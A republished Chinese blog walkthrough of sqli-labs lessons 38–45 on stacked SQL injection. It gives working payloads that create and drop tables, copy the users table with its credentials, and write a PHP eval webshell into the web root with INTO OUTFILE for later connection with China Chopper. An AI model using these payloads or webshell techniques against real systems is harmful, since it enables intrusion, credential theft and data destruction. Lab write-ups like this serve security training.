码迷,mamicode.com
首页 > 数据库 > 详细

sql-lib闯关之lesson38-45

时间:2020-03-14 23:28:33      阅读:91      评论:0      收藏:0      [点我收藏+]

标签:出现   登录   www   blog   文件夹   命令   log   tab   就是   

知识铺垫之堆叠注入:
参考链接:https://www.cnblogs.com/lcamry/p/5762905.html
简而言之就是多条语句通过;分割同时使用。
LESS38

参数:  ‘1’

 

输入:?id=1‘;create table czs1 like users; --+

技术图片

 

 可以在sql命令行中输入密码 use security ; show tables;两个命令查看是否创建成功。
如图已经创建成功
技术图片

 

 输入:?id=1‘;drop table czs1; --+

技术图片

 

 sql命令查看:
技术图片

 

 

LESS39

参数闭合为 1

 其他相同
LESS40

参数  (‘1’)错误信息不回显  其他相同
LESS41

参数  1  错误信息不回显  其他相同


LESS42

前面我们也有过类似的,使用的是二次注入,也就是通过注入一个新账户越权修改目标账户密码。

观察login.php源码文件,我们发现了username中出现了熟悉的转义函数,而password没有,我们猜测password可以注入。另外,可以发现参数是以单引号进行包裹的。
技术图片

 

 

进入关卡我们可以通过审查元素来更改password类型为text,方便观察。
技术图片

 

 

输入:  a’;create table czs3 like users ;#

技术图片

 

 点击登录,然后通过sql命令行观察,创建成功

技术图片

 

 另外我们可以 通过命令 insert into czs select *  from users;来使得新建的czs库中存放users内容相同的信息,也就是用户名和密码。

接下来我们也可以使用 drop语句删除我们创建的数据库。


LESS43

参数:(‘1’) 其他相同。
输入:a‘);create table czs like users;insert into czs select *from users; #
LESS44

参数: ‘1’ 就是没有回显
LESS45

参数(‘1’) 没有回显

 

 

另外,我们可以通过堆叠注入来写入一句话木马,从而使用中国菜刀进行连接
输入:a’);select ‘<?php @eval($_POST[“czs”]);?>‘ into outfile ‘C:\\PhpStudy\\PHPTutorial\\WWW\\sqli-labs\\Less-45\\czs.php’ #

原始函数就是 select xxx(一句话木马,要记住自己设置的密码) into outfile  xxx(路径,需要\\分割,防止转义)

输入完成后,我们可以发现在目标文件夹中出现一个czs.php的文件,内容是一句话木马,然后我们可以通过中国菜刀进行连接从而获取更高的权限。

sql-lib闯关之lesson38-45

标签:出现   登录   www   blog   文件夹   命令   log   tab   就是   

原文地址:https://www.cnblogs.com/c1047509362/p/12495067.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!